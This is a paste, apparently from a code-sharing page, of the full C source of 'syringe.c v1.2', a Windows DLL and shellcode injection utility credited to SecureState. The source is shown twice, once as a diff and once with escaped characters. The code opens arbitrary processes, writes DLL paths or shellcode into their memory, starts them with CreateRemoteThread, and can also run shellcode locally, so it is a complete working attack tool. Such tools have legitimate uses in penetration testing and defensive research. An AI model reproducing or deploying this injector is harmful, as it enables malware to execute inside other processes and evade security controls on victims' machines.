decay88 · August 28, 2018 12:47
diff --git a/syringe.c b/syringe.c
 /*
 *
 *		syringe.c v1.2
 * 
 * 		Author: Spencer McIntyre (Steiner) <smcintyre [at] securestate [dot] com>
 *
 *		A General Purpose DLL & Code Injection Utility
 *	
 *		Copyright 2011 SecureState
 *
 *      This program is free software; you can redistribute it and/or modify
 *      it under the terms of the GNU General Public License as published by
 *      the Free Software Foundation; either version 2 of the License, or
 *      (at your option) any later version.
 *      
 *      This program is distributed in the hope that it will be useful,
 *      but WITHOUT ANY WARRANTY; without even the implied warranty of
 *      MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *      GNU General Public License for more details.
 *      
 *      You should have received a copy of the GNU General Public License
 *      along with this program; if not, write to the Free Software
 *      Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
 *      MA 02110-1301, USA.
 * 
 */

 #include <windows.h>
 #include <stdio.h>
 #include <tlhelp32.h>

 #define MAXLINE 512
 #define CREATE_THREAD_ACCESS (PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ)
 #define REMOTE_ASSEMBLY_STUB_LENGTH_RELEASE 32
 #define ATTACK_TYPE_DLL_INJECTION 1
 #define ATTACK_TYPE_SHELL_CODE_INJECTION 2
 #define ATTACK_TYPE_EXECUTE_SHELL_CODE 3

 int InjectDLL(char *dll, int ProcessID);
 int InjectShellcode(char *data, int ProcessID);
 int ExecuteShellcode(char *data);
 DWORD WINAPI RemoteExecPayloadStub(LPVOID lpParameter);
 DWORD WINAPI LocalExecPayloadStub(LPVOID lpParameter);

 int main(int argc, char* argv[]) {
 	char dllPath[MAXLINE] = "";
 	unsigned int pid = 0;
 	unsigned int injResult;
 	unsigned char attackType = 0;
 	unsigned char numargs = 4;
 	char *usageString = "Syringe v1.2\nA General Purpose DLL & Code Injection Utility\n\nUsage:\n\nInject DLL:\n\tsyringe.exe -1 [ dll ] [ pid ]\n\nInject Shellcode:\n\tsyringe.exe -2 [ shellcode ] [ pid ]\n\nExecute Shellcode:\n\tsyringe.exe -3 [ shellcode ]\n";

 	if (argc < 2) {
 		printf("%s", usageString);
 		return 0;
 	}
 	if (strncmp(argv[1], "-1", 2) == 0) {
 		attackType = ATTACK_TYPE_DLL_INJECTION;
 	} else if (strncmp(argv[1], "-2", 2) == 0) {
 		attackType = ATTACK_TYPE_SHELL_CODE_INJECTION;
 	} else if (strncmp(argv[1], "-3", 2) == 0) {
 		attackType = ATTACK_TYPE_EXECUTE_SHELL_CODE;
 		numargs = 3;
 	} else {
 		printf("%s", usageString);
 		return 0;
 	}
 	if (argc != numargs) {
 		printf("%s", usageString);
 		return 0;
 	}
 	
 	if ((attackType == ATTACK_TYPE_DLL_INJECTION) || (attackType == ATTACK_TYPE_SHELL_CODE_INJECTION)) {
 		pid = atoi(argv[3]);
 		if (!pid) {
 			printf("Invalid Process ID.\n");
 			return 0;
 		}
 		if (attackType == ATTACK_TYPE_DLL_INJECTION) {
 			GetFullPathNameA(argv[2], MAXLINE, dllPath, NULL);
 			injResult = InjectDLL(dllPath, pid);
 		} else if (attackType == ATTACK_TYPE_SHELL_CODE_INJECTION) {
 			injResult = InjectShellcode(argv[2], pid);
 		}

 		if (injResult == 0) {
 			printf("Successfully Injected.\n");
 		} else {
 			printf("Failed To Inject. \nError: ");
 			switch (injResult) {
 				case 1: { printf("Invalid Process ID.\n"); break; }
 				case 2: { printf("Could Not Open A Handle To The Process.\n"); break; }
 				case 3: { printf("Could Not Get The Address Of LoadLibraryA.\n"); break; }
 				case 4: { printf("Could Not Allocate Memory In Remote Process.\n"); break; }
 				case 5: { printf("Could Not Write To Remote Process.\n"); break; }
 				case 6: { printf("Could Not Start The Remote Thread.\n"); break; }
 			}
 		}
 	} else if (attackType == ATTACK_TYPE_EXECUTE_SHELL_CODE) {
 		ExecuteShellcode(argv[2]);
 	}
 	return 0;
 }

 int InjectDLL(char *dll, int ProcessID) {
 	HANDLE Proc, RemoteThread;
 	LPVOID RemoteStringPtr, LoadLibAddr;
 	int writeProcError;

 	if(!ProcessID) {
 		return 1;
 	}
 	Proc = OpenProcess(CREATE_THREAD_ACCESS, FALSE, ProcessID);
 	if(!Proc) {
 		return 2;
 	}
 	LoadLibAddr = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
 	if (LoadLibAddr == NULL) {
 		return 3;
 	}
 	RemoteStringPtr = (LPVOID)VirtualAllocEx(Proc, NULL, strlen(dll), MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
 	if (RemoteStringPtr == NULL) {
 		return 4;
 	}
 	writeProcError = WriteProcessMemory(Proc, (LPVOID)RemoteStringPtr, dll, strlen(dll), NULL);
 	if (writeProcError == 0) {
 		return 5;
 	}
 	RemoteThread = CreateRemoteThread(Proc, NULL, NULL, (LPTHREAD_START_ROUTINE)LoadLibAddr, (LPVOID)RemoteStringPtr, NULL, NULL);
 	if (RemoteThread == NULL) {
 		return 6;
 	}
 	CloseHandle(Proc);
 	return 0;
 }

 int InjectShellcode(char *data, int ProcessID) {
 	HANDLE Proc, RemoteThread;
 	void *RemoteStringPtr;
 	void *RemoteStubPtr;
 	int writeProcError;
 	unsigned long oldprot;

 	// Step 1, get a handle to a process
 	if(!ProcessID) {
 		return 1;
 	}
 	Proc = OpenProcess(CREATE_THREAD_ACCESS, FALSE, ProcessID);
 	if(!Proc) {
 		return 2;
 	}

 	// Step 2, write the shellcode to the remote process
 	RemoteStringPtr = VirtualAllocEx(Proc, NULL, (strlen(data) + 1), MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 	if (RemoteStringPtr == NULL) {
 		return 4;
 	}
 	writeProcError = WriteProcessMemory(Proc, RemoteStringPtr, data, strlen(data), NULL);
 	if (writeProcError == 0) {
 		return 5;
 	}

 	// Step 3, write the assembly stub that will call the shellcode in the remote process
 	RemoteStubPtr = VirtualAllocEx(Proc, NULL, REMOTE_ASSEMBLY_STUB_LENGTH_RELEASE, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 	if (RemoteStubPtr == NULL) {
 		return 4;
 	}
 	VirtualProtect(RemoteExecPayloadStub, REMOTE_ASSEMBLY_STUB_LENGTH_RELEASE, PAGE_EXECUTE_READWRITE, &oldprot);
 	writeProcError = WriteProcessMemory(Proc, RemoteStubPtr, RemoteExecPayloadStub, REMOTE_ASSEMBLY_STUB_LENGTH_RELEASE, NULL);
 	if (writeProcError == 0) {
 		return 5;
 	}

 	// Step 4, start the assembly stub in via a call to CreateRemoteThread()
 	RemoteThread = CreateRemoteThread(Proc, NULL, NULL, (LPTHREAD_START_ROUTINE)RemoteStubPtr, (LPVOID)RemoteStringPtr, NULL, NULL);
 	if (RemoteThread == NULL) {
 		return 6;
 	}
 	CloseHandle(Proc);

 	// Step 5, Profit.
 	return 0;
 }

 int ExecuteShellcode(char *data) {
 	HANDLE LocalThread;
 	int tid;
 	void *StringPtr;
 	StringPtr = VirtualAlloc(NULL, (strlen(data) + 1), MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 	strncpy(StringPtr, data, strlen(data));
 	LocalThread = CreateThread(NULL, 0, LocalExecPayloadStub, StringPtr, 0, &tid);
 	printf("Waiting For Shellcode To Return... ");
 	WaitForSingleObject(LocalThread, INFINITE);
 	printf("Done.\n");
 	return 0;
 }

 DWORD WINAPI RemoteExecPayloadStub(LPVOID lpParameter) {
 	__asm {
 		mov eax, [lpParameter]
 		call eax
 		
 		// Exit function is thread, don't mess this up
 		push 0
 		call ExitThread
 	}
 	return 0;
 }

 DWORD WINAPI LocalExecPayloadStub(LPVOID lpParameter) {
 	__try {
 		__asm {
 			mov eax, [lpParameter]
 			call eax

 			push 0
 			call ExitThread
 		}
 	}
 	__except(EXCEPTION_EXECUTE_HANDLER) {
 	}
 	
 	return 0;
 }
	/*
	*
	* syringe.c v1.2
	*
	* Author: Spencer McIntyre (Steiner) <smcintyre [at] securestate [dot] com>
	*
	* A General Purpose DLL & Code Injection Utility
	*
	* Copyright 2011 SecureState
	*
	* This program is free software; you can redistribute it and/or modify
	* it under the terms of the GNU General Public License as published by
	* the Free Software Foundation; either version 2 of the License, or
	* (at your option) any later version.
	*
	* This program is distributed in the hope that it will be useful,
	* but WITHOUT ANY WARRANTY; without even the implied warranty of
	* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
	* GNU General Public License for more details.
	*
	* You should have received a copy of the GNU General Public License
	* along with this program; if not, write to the Free Software
	* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
	* MA 02110-1301, USA.
	*
	*/

	#include <windows.h>
	#include <stdio.h>
	#include <tlhelp32.h>

	#define MAXLINE 512
	#define CREATE_THREAD_ACCESS (PROCESS_CREATE_THREAD \| PROCESS_QUERY_INFORMATION \| PROCESS_VM_OPERATION \| PROCESS_VM_WRITE \| PROCESS_VM_READ)
	#define REMOTE_ASSEMBLY_STUB_LENGTH_RELEASE 32
	#define ATTACK_TYPE_DLL_INJECTION 1
	#define ATTACK_TYPE_SHELL_CODE_INJECTION 2
	#define ATTACK_TYPE_EXECUTE_SHELL_CODE 3

	int InjectDLL(char *dll, int ProcessID);
	int InjectShellcode(char *data, int ProcessID);
	int ExecuteShellcode(char *data);
	DWORD WINAPI RemoteExecPayloadStub(LPVOID lpParameter);
	DWORD WINAPI LocalExecPayloadStub(LPVOID lpParameter);

	int main(int argc, char* argv[]) {
	char dllPath[MAXLINE] = "";
	unsigned int pid = 0;
	unsigned int injResult;
	unsigned char attackType = 0;
	unsigned char numargs = 4;
	char *usageString = "Syringe v1.2\nA General Purpose DLL & Code Injection Utility\n\nUsage:\n\nInject DLL:\n\tsyringe.exe -1 [ dll ] [ pid ]\n\nInject Shellcode:\n\tsyringe.exe -2 [ shellcode ] [ pid ]\n\nExecute Shellcode:\n\tsyringe.exe -3 [ shellcode ]\n";

	if (argc < 2) {
	printf("%s", usageString);
	return 0;
	}
	if (strncmp(argv[1], "-1", 2) == 0) {
	attackType = ATTACK_TYPE_DLL_INJECTION;
	} else if (strncmp(argv[1], "-2", 2) == 0) {
	attackType = ATTACK_TYPE_SHELL_CODE_INJECTION;
	} else if (strncmp(argv[1], "-3", 2) == 0) {
	attackType = ATTACK_TYPE_EXECUTE_SHELL_CODE;
	numargs = 3;
	} else {
	printf("%s", usageString);
	return 0;
	}
	if (argc != numargs) {
	printf("%s", usageString);
	return 0;
	}

	if ((attackType == ATTACK_TYPE_DLL_INJECTION) \|\| (attackType == ATTACK_TYPE_SHELL_CODE_INJECTION)) {
	pid = atoi(argv[3]);
	if (!pid) {
	printf("Invalid Process ID.\n");
	return 0;
	}
	if (attackType == ATTACK_TYPE_DLL_INJECTION) {
	GetFullPathNameA(argv[2], MAXLINE, dllPath, NULL);
	injResult = InjectDLL(dllPath, pid);
	} else if (attackType == ATTACK_TYPE_SHELL_CODE_INJECTION) {
	injResult = InjectShellcode(argv[2], pid);
	}

	if (injResult == 0) {
	printf("Successfully Injected.\n");
	} else {
	printf("Failed To Inject. \nError: ");
	switch (injResult) {
	case 1: { printf("Invalid Process ID.\n"); break; }
	case 2: { printf("Could Not Open A Handle To The Process.\n"); break; }
	case 3: { printf("Could Not Get The Address Of LoadLibraryA.\n"); break; }
	case 4: { printf("Could Not Allocate Memory In Remote Process.\n"); break; }
	case 5: { printf("Could Not Write To Remote Process.\n"); break; }
	case 6: { printf("Could Not Start The Remote Thread.\n"); break; }
	}
	}
	} else if (attackType == ATTACK_TYPE_EXECUTE_SHELL_CODE) {
	ExecuteShellcode(argv[2]);
	}
	return 0;
	}

	int InjectDLL(char *dll, int ProcessID) {
	HANDLE Proc, RemoteThread;
	LPVOID RemoteStringPtr, LoadLibAddr;
	int writeProcError;

	if(!ProcessID) {
	return 1;
	}
	Proc = OpenProcess(CREATE_THREAD_ACCESS, FALSE, ProcessID);
	if(!Proc) {
	return 2;
	}
	LoadLibAddr = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
	if (LoadLibAddr == NULL) {
	return 3;
	}
	RemoteStringPtr = (LPVOID)VirtualAllocEx(Proc, NULL, strlen(dll), MEM_RESERVE\|MEM_COMMIT, PAGE_READWRITE);
	if (RemoteStringPtr == NULL) {
	return 4;
	}
	writeProcError = WriteProcessMemory(Proc, (LPVOID)RemoteStringPtr, dll, strlen(dll), NULL);
	if (writeProcError == 0) {
	return 5;
	}
	RemoteThread = CreateRemoteThread(Proc, NULL, NULL, (LPTHREAD_START_ROUTINE)LoadLibAddr, (LPVOID)RemoteStringPtr, NULL, NULL);
	if (RemoteThread == NULL) {
	return 6;
	}
	CloseHandle(Proc);
	return 0;
	}

	int InjectShellcode(char *data, int ProcessID) {
	HANDLE Proc, RemoteThread;
	void *RemoteStringPtr;
	void *RemoteStubPtr;
	int writeProcError;
	unsigned long oldprot;

	// Step 1, get a handle to a process
	if(!ProcessID) {
	return 1;
	}
	Proc = OpenProcess(CREATE_THREAD_ACCESS, FALSE, ProcessID);
	if(!Proc) {
	return 2;
	}

	// Step 2, write the shellcode to the remote process
	RemoteStringPtr = VirtualAllocEx(Proc, NULL, (strlen(data) + 1), MEM_RESERVE\|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (RemoteStringPtr == NULL) {
	return 4;
	}
	writeProcError = WriteProcessMemory(Proc, RemoteStringPtr, data, strlen(data), NULL);
	if (writeProcError == 0) {
	return 5;
	}

	// Step 3, write the assembly stub that will call the shellcode in the remote process
	RemoteStubPtr = VirtualAllocEx(Proc, NULL, REMOTE_ASSEMBLY_STUB_LENGTH_RELEASE, MEM_RESERVE\|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (RemoteStubPtr == NULL) {
	return 4;
	}
	VirtualProtect(RemoteExecPayloadStub, REMOTE_ASSEMBLY_STUB_LENGTH_RELEASE, PAGE_EXECUTE_READWRITE, &oldprot);
	writeProcError = WriteProcessMemory(Proc, RemoteStubPtr, RemoteExecPayloadStub, REMOTE_ASSEMBLY_STUB_LENGTH_RELEASE, NULL);
	if (writeProcError == 0) {
	return 5;
	}

	// Step 4, start the assembly stub in via a call to CreateRemoteThread()
	RemoteThread = CreateRemoteThread(Proc, NULL, NULL, (LPTHREAD_START_ROUTINE)RemoteStubPtr, (LPVOID)RemoteStringPtr, NULL, NULL);
	if (RemoteThread == NULL) {
	return 6;
	}
	CloseHandle(Proc);

	// Step 5, Profit.
	return 0;
	}

	int ExecuteShellcode(char *data) {
	HANDLE LocalThread;
	int tid;
	void *StringPtr;
	StringPtr = VirtualAlloc(NULL, (strlen(data) + 1), MEM_RESERVE\|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	strncpy(StringPtr, data, strlen(data));
	LocalThread = CreateThread(NULL, 0, LocalExecPayloadStub, StringPtr, 0, &tid);
	printf("Waiting For Shellcode To Return... ");
	WaitForSingleObject(LocalThread, INFINITE);
	printf("Done.\n");
	return 0;
	}

	DWORD WINAPI RemoteExecPayloadStub(LPVOID lpParameter) {
	__asm {
	mov eax, [lpParameter]
	call eax

	// Exit function is thread, don't mess this up
	push 0
	call ExitThread
	}
	return 0;
	}

	DWORD WINAPI LocalExecPayloadStub(LPVOID lpParameter) {
	__try {
	__asm {
	mov eax, [lpParameter]
	call eax

	push 0
	call ExitThread
	}
	}
	__except(EXCEPTION_EXECUTE_HANDLER) {
	}

	return 0;
	}